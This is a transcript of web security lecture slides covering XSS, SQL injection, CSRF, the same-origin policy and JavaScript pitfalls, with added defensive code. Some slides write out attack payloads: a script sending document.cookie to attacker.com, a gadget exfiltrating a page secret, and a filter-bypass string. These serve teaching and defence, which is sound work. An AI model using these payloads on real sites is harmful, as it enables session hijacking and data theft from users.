
Web Programming and Security

Web Programming and Security. Lecture 2, Tamara Rezk. Security problems: availability violation, confidentiality violation, integrity violation. Attacks, summary: phishing attacks (eg MySpace, 2006).





Presentation Transcript


  1. Web Programming and Security Lecture 2 Tamara Rezk

  2. Security problems • Availability violation • Confidentiality violation • Integrity violation

  3. Attacks, summary • Phishing attacks (eg MySpace, 2006)

  4. Attacks, summary • Phishing attacks (eg MySpace, 2006) • Session integrity violation (eg Dansie shopping cart, 2006)

  5. Attacks, summary • Phishing attacks (eg MySpace, 2006) • Session integrity attacks (eg Dansie shopping cart, 2006) • Cross site request forgery attacks (eg Gmail, 2007)

  6. Prevention • Server side: • add a secret that the attacker cannot guess • re-authenticate for critical operations • User side: • logging off one site before using others

  7. Attacks, summary • Phishing attacks (eg MySpace, 2006) • Session integrity attacks (eg Dansie shopping cart, 2006) • Cross site request forgery attacks (eg Gmail, 2007) • Navigation policy based attacks (eg Guninski/Citibank, 1999)

  8. Attacks, classification? • Phishing attacks (eg MySpace, 2006) • Session integrity attacks (eg Dansie shopping cart, 2006) • Cross site request forgery attacks (eg Gmail, 2007) • Navigation policy based attacks (eg Guninski/Citibank, 1999)

  9. Lessons Learned. Do not trust the client on: • Maintaining integrity of session state • Running client code • Providing valid input

  10. Lessons Learned. Do not trust the client on: Providing valid input
      public class Greeting extends HttpServlet {
        public void doGet(HttpServletRequest req, HttpServletResponse res)
            throws ServletException, IOException {
          res.setContentType("text/html");
          PrintWriter out = res.getWriter();
          String name = req.getParameter("name");           // untrusted client input
          out.println("<HTML>\n<BODY>\n");
          out.println("Greeting from " + name + "\n");      // echoed without encoding
          out.println("</BODY>\n</HTML>\n");
        }
      }

  11. Lessons Learned. Do not trust the client: http://host/Greeting?name=<script> …</script>

  12. Security in Web Applications. Main sources of vulnerabilities: • Cross-site scripting • Information leakage • SQL Injection. The multitier nature causes problems. From Cenzic Web Security Trends Report Q1-Q2 2010

  13. Code injection • Data-tier code injection (SQL) • Client-tier code injection (Javascript) • Server-tier code injection

  14. SQL Injection Query = "SELECT score FROM Student where name = '" + input
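An added example, not from the lecture, that makes the slide's query concrete: a minimal SQL tokenizer reduces a query to its skeleton (every literal replaced by "?") and checks whether untrusted input changed that skeleton. The tokenizer covers only the subset needed here (an assumption: single-quoted literals with '' as the escape, words, integers and a few operators), and a closing quote is appended to the slide's fragment so a benign name parses.

```javascript
// Added example (not from the lecture): concatenating input into the query lets
// the input change the query's structure; binding it as one literal cannot.

function tokenize(sql) {
  const tokens = [];
  let i = 0;
  while (i < sql.length) {
    const ch = sql[i];
    if (/\s/.test(ch)) { i++; continue; }
    if (ch === "'") {
      // String literal: read to the closing quote; '' inside stands for one quote.
      let j = i + 1, value = "", closed = false;
      while (j < sql.length) {
        if (sql[j] === "'") {
          if (sql[j + 1] === "'") { value += "'"; j += 2; continue; }
          closed = true; j++; break;
        }
        value += sql[j++];
      }
      tokens.push({ type: closed ? "string" : "unterminated", value });
      i = j;
      continue;
    }
    const m = /^([A-Za-z_][A-Za-z0-9_]*|[0-9]+|<>|<=|>=|[=<>(),;*]|--[^\n]*)/.exec(sql.slice(i));
    if (!m) { tokens.push({ type: "other", value: ch }); i++; continue; }
    const text = m[0];
    const type = /^[A-Za-z_]/.test(text) ? "word"
               : /^[0-9]/.test(text) ? "number"
               : text.startsWith("--") ? "comment" : "symbol";
    tokens.push({ type, value: type === "word" ? text.toUpperCase() : text });
    i += text.length;
  }
  return tokens;
}

// Query skeleton: literals become "?", everything else is kept.
// Untrusted data may only ever influence the literals, never the skeleton.
function skeleton(sql) {
  return tokenize(sql)
    .map(t => (t.type === "string" || t.type === "number") ? "?" : t.value)
    .join(" ");
}

// The vulnerable pattern from the slide (closing quote added).
function buildByConcatenation(input) {
  return "SELECT score FROM Student WHERE name = '" + input + "'";
}

// What a parameter binding does on the wire: the value becomes one literal.
function sqlLiteral(value) {
  return "'" + String(value).replace(/'/g, "''") + "'";
}
function buildWithBinding(input) {
  return "SELECT score FROM Student WHERE name = " + sqlLiteral(input);
}

// Structural check: the skeleton for `input` must equal the skeleton for a
// known-benign value; any difference means the input escaped its literal.
function structureChanged(build, input) {
  return skeleton(build(input)) !== skeleton(build("benign"));
}
```

In real code the driver's parameterized-query API does the binding; `sqlLiteral` only exposes the mechanism. Note that a harmless name containing an apostrophe (O'Brien) also breaks the concatenated query, which is a usability reason, not just a security one, to bind parameters.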

  15. SQL Code Injection Attack, Microsoft 2008

  16. CardSystems out of business, 2005 (SQL Code injection attack) 263000 numbers stolen!

  17. Dynamic Code Generation
      s(i1, …, in) → c
      s: server program
      i1, …, in: untrusted input (provided by the client)
      c: client code, an HTML document with Javascript nodes
      Let's see a guestbook example

  18. Attack to the guestbook <script> alert("attack!"); </script>

  19. Embedding Javascript
      External Javascript file:
        <script type="text/javascript" src="myCode.js"></script>
      Inline code:
        <script type="text/javascript">
        //<![CDATA[
        alert("Page is loading");
        //]]>
        </script>
      Event handler:
        <p onclick="alert('I told you not to click on me!');">Please do not click on this text.</p>

  20. Let’s see some other ways to inject code

  21. Code Injection, other example • Untrusted client input: <script>window.location = "http://attacker.com?cookie=" + document.cookie;</script> • Goal: inject the code to a benign user • Consequence: • Cookie stolen by attacker.com • Possibly sensitive private information

  22. Code Injection & XSS - Example (diagram: Malicious user, Guestbook server, Database, Benign user, Attacker.com)
      Malicious user → Guestbook server: Add entry: <script>window.location = "http://attacker.com?cookie=" + document.cookie;</script>
      Benign user → Guestbook server: Get all entries
      Guestbook server → Benign user: the stored entries, script included
      Benign user's browser → Attacker.com: secret cookies

  23. Existing Server-side Prevention
      Programmer attention required!! (vulnerable code → attack → release patched code)
      • Escaping
      • Filtering. Example: preg_replace("script", "", input) is bypassed: "<scrscriptipt>" → "<script>"
      • Instruction randomization (randomized code): Boyd et al. [2004]
      • Taint analysis: WebSSARI, Huang et al. [2004]; Pixy, Jovanovic et al. [2006]; Xie and Aiken [2006]; …
      • String analysis: Minamide [2005]; Balzarotti [2008]; Wassermann et al. [2008]; …
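An added example, not from the lecture, that ties the Greeting servlet of slide 10 to the filtering slide above: the greeting rendered once with output encoding and once through the single-pass "script" removal filter, so the two defences can be compared on the same input. The rendering functions are constructed stand-ins for the servlet's output.

```javascript
// Added example (not from the lecture): output encoding next to the
// preg_replace("script", "", input) filter from the prevention slide.

// Encode the characters that carry meaning in HTML text and attribute contexts.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: mirrors Greeting.doGet, untrusted `name` concatenated into HTML.
function renderGreetingUnsafe(name) {
  return "<HTML>\n<BODY>\nGreeting from " + name + "\n</BODY>\n</HTML>\n";
}

// Fixed: same page, `name` encoded before it reaches the HTML output.
function renderGreetingSafe(name) {
  return "<HTML>\n<BODY>\nGreeting from " + escapeHtml(name) + "\n</BODY>\n</HTML>\n";
}

// The slide's filter in JS form: one pass that deletes every "script".
function naiveStripScript(input) {
  return input.replace(/script/g, "");
}

// Crude check used for the comparison: does the page still contain a raw <script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Run one input through all three renderings and report where a script tag survives.
function compare(input) {
  return {
    unsafe: containsScriptTag(renderGreetingUnsafe(input)),
    filtered: containsScriptTag(renderGreetingUnsafe(naiveStripScript(input))),
    encoded: containsScriptTag(renderGreetingSafe(input)),
  };
}
```

For the nested input from the slide the filter manufactures the very tag it was meant to remove, while encoding turns any input into inert text regardless of what substrings it contains; that is why encoding at the output point is the fix and a removal blacklist is not.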

  24. HTML parser and browser quirks • Standard HTML parser • Obtain target syntax tree • No ill-formed result produced • Various ways of triggering the JS engine (BEEP [Jim et al. 2007]): • Event listener: (<DIV> :onclick "alert(msg)") • Hyperlink: (<A> :href "javascript:alert(msg)") • Dynamic code evaluation: eval, document.write • Solution: turning off all these features in Hop • Advantage of a multitier language: NOT identified by syntax difference

  25. Code Injection Attack vectors

  26. Web 2.0 Applications • 2004: AJAX (Asynchronous Javascript and XML) becomes popular, social sites emerge • XMLHttpRequest object for asynchronous communication: request a service, partial reloading of the webpage (iframe) • Technologies: Web Browser, Web Server, HTTP, HTML • CGI: Common Gateway Interface • AJAX: Javascript, CSS, XML, DOM, XMLHttpRequest

  27. Mashups: HousingMaps, 2005

  28. Web Mashup (diagram: Google Maps Gadget + Integrator's Housing Data, "Great way to use your data!") • Web application (client side): integrating a third-party gadget • Integrator partially sharing information with the gadget • Example: Housingmap.com

  29. Le Monde is a mashup

  30. Code of Le Monde <iframe src="http://www.youtube.com/embed/W8WP2SjsZw4?rel=0" width="520" height="294" frameborder="0"></iframe>

  31. ALL OR NOTHING TRUST MODEL IN THE BROWSER The Same Origin Policy

  32. Programming Model – Dilemma (diagram: Google Maps Gadget + Integrator's Housing Data)
      Using the <script> tag: • Full sharing (JS env.) • Running as integrator • Gadget trusted
      Using an <iframe> frame: • Full isolation (by SOP) • Running as gadget • Limited sharing: fragment identifier, postMessage

  33. The same origin policy (SOP) • The <iframe> tag: what about Javascript behaviour? (diagram: browser heap with two separate global objects, one for the integrator's code and one for the frame) <iframe src="http://b.com/gadget.js"> … </iframe>

  34. The same origin policy (SOP) • The <script> tag treats the loaded code as code from the same origin (diagram: the browser loads the integrator's code from server a.com and <script src="http://b.com/gadget.js"> from server b.com)

  35. The same origin policy (SOP) • The <script> tag: what about Javascript behaviour? (diagram: integrator's code and <script src="http://b.com/gadget.js"> share one global object in the browser)

  36. The same origin policy (SOP) Let’s talk about Javascript!!

  37. An evil gadget
      integrator.html:
        <script src="http://attacker.com/gadget.js"></script>
        <div id="secret">42</div>
      gadget.js:
        secret = document.getElementById("secret").innerHTML;
        setTimeout('delayer()', 5000);
        delayer = function() {
          window.location = "EvilSite.php?secret=" + secret;
        }

  38. Javascript Important JavaScript detail: o.f is treated as o["f"] Thanks Shriram Krishnamurthi for this slide

  39. Is this function safe?
      lookup = function(o, fd) {
        if (fd === "XHR") {
          return "unsafe!";
        } else {
          return o[fd];
        }
      }
      If fd is not a string, JavaScript invokes the .toString method to convert the value to a string

  40. …in fact, lookup is unsafe!
      badObj = {toString: function () { return "XHR" }}
      lookup(window, badObj)
      → window[badObj]
      → window[{toString: …}]
      → window[{toS…: …}.toS…()]
      → window[(function () …)()]
      → window["XHR"]
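The slide's lookup beside a version that refuses the implicit conversion, as an added example that is not part of the lecture. A plain object stands in for window, and badObj is the object from the slide.

```javascript
// Added example (not from the lecture): why lookup is unsafe and how to close the hole.

// The slide's version: the denylist check only works if fd is already a string.
function lookupUnsafe(o, fd) {
  if (fd === "XHR") { return "unsafe!"; }
  return o[fd];   // property-key coercion calls fd.toString() here, after the check
}

// Fixed: accept only primitive strings as property names, so no caller-controlled
// toString/valueOf runs and the check sees exactly the key used for the lookup.
// Own-property test keeps the lookup from walking up the prototype chain.
function lookupSafe(o, fd) {
  if (typeof fd !== "string") { throw new TypeError("property name must be a string"); }
  if (fd === "XHR") { return "unsafe!"; }
  if (!Object.prototype.hasOwnProperty.call(o, fd)) { return undefined; }
  return o[fd];
}

// Constructed stand-in for the global object and the slide's badObj.
const fakeWindow = { XHR: "the real XMLHttpRequest", harmless: 1 };
const badObj = { toString: function () { return "XHR"; } };

// Run both lookups against badObj and report what each one does.
function demonstrate() {
  let safeOutcome;
  try { lookupSafe(fakeWindow, badObj); safeOutcome = "returned"; }
  catch (e) { safeOutcome = e instanceof TypeError ? "rejected" : "error"; }
  return {
    unsafe: lookupUnsafe(fakeWindow, badObj),   // coerces to "XHR" and hands it out
    safe: safeOutcome,                          // "rejected"
    safeString: lookupSafe(fakeWindow, "XHR"),  // "unsafe!"
  };
}
```

The same typeof check covers valueOf and Symbol.toPrimitive tricks, since none of them run unless a conversion is attempted.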

  41. More evals: e.g., setTimeout:
      function f() { alert('hello'); }
      setTimeout(f, 1000);
      var s = "alert('hello')";
      setTimeout(s, 1000);   // Any JavaScript string!

  42. Let’s try some more code with setTimeout

  43. <script>
      s = "alert('Lets talk about Javascript!')";
      setTimeout(s, 100)
      </script>

  44. <script>
      function fac(x) {
        if (x <= 1) { return 1; }
        return x * fac(x - 1);
      }
      r = fac(3);
      s = "alert(" + r + ")";
      setTimeout(s, 100)
      </script>

  45. What happens now?
      <script src=attacker.js></script>
      </head>
      <body>
      <script>
      function fac(x) {
        if (x <= 1) { return 1; }
        return x * fac(x - 1);
      }
      r = fac(4);
      s = "alert(" + r + ")";
      setTimeout(s, 100)
      </script>

  46. Anything Else? • Wrap DOM nodes and callbacks • Don't hand references to DOM nodes to the wrong functions • Avoid other conditionally unsafe calls • Be aware of implicit method calls in JavaScript's semantics • Simulate private fields (JavaScript provides none) • Disallow arbitrary traversal of the object graph • Avoid leaking the global object • Make sure all invariants hold over 50+ entry points. Thank you Shriram Krishnamurthi for all the recommendations! Check ADsafety

  47. The same origin policy (SOP) • The <iframe> tag: what about Javascript behaviour? (diagram: browser heap with two separate global objects, one for the integrator's code and one for the frame) <iframe src="http://b.com/gadget.js"> … </iframe>

  48. Frame Communication

  49. Fragment Identifier Messaging • Send information by navigating a frame • http://gadget.com/#hello • Navigating to a fragment doesn't reload the frame • No network traffic, but the frame can read its fragment • Not a secure channel: • Confidentiality • Integrity • Authentication
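The postMessage alternative mentioned on the programming-model slide, shown from the receiving frame's side, as an added example that is not part of the lecture. The event objects are constructed stand-ins for the browser's MessageEvent (only origin and data are used), the trusted origin is assumed, and the message format is a made-up one for a map gadget.

```javascript
// Added example (not from the lecture): a postMessage receiver that checks who
// sent the message and treats the payload as data, which fragment-identifier
// messaging cannot do because the fragment carries no sender identity.

// Assumed allowlist of integrator origins this gadget accepts messages from.
const TRUSTED_ORIGINS = new Set(["https://integrator.example"]);

// Validate one incoming message; never evaluates event.data as code.
function handleGadgetMessage(event) {
  // 1. Sender authentication: the browser fills in event.origin; a sender cannot forge it.
  if (!TRUSTED_ORIGINS.has(event.origin)) {
    return { accepted: false, reason: "untrusted origin " + event.origin };
  }
  // 2. Treat data as data: expect a small structured message with a known type.
  const msg = event.data;
  if (typeof msg !== "object" || msg === null || typeof msg.type !== "string") {
    return { accepted: false, reason: "malformed message" };
  }
  if (msg.type === "setLocation") {
    if (typeof msg.lat !== "number" || typeof msg.lng !== "number") {
      return { accepted: false, reason: "bad coordinates" };
    }
    return { accepted: true, action: "setLocation", lat: msg.lat, lng: msg.lng };
  }
  return { accepted: false, reason: "unknown message type " + msg.type };
}

// Sending side (constructed): name the intended recipient origin rather than "*",
// so a frame that has been navigated elsewhere cannot read the message.
// In a browser this becomes frame.postMessage(payload, targetOrigin).
function buildOutgoing(targetOrigin, payload) {
  if (targetOrigin === "*") {
    throw new Error("refusing wildcard targetOrigin for sensitive data");
  }
  return { targetOrigin, payload };
}
```

The origin check gives the authentication that the fragment channel lacks; the explicit targetOrigin on the sending side is the matching confidentiality check, since the browser then delivers the message only if the frame still belongs to that origin.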
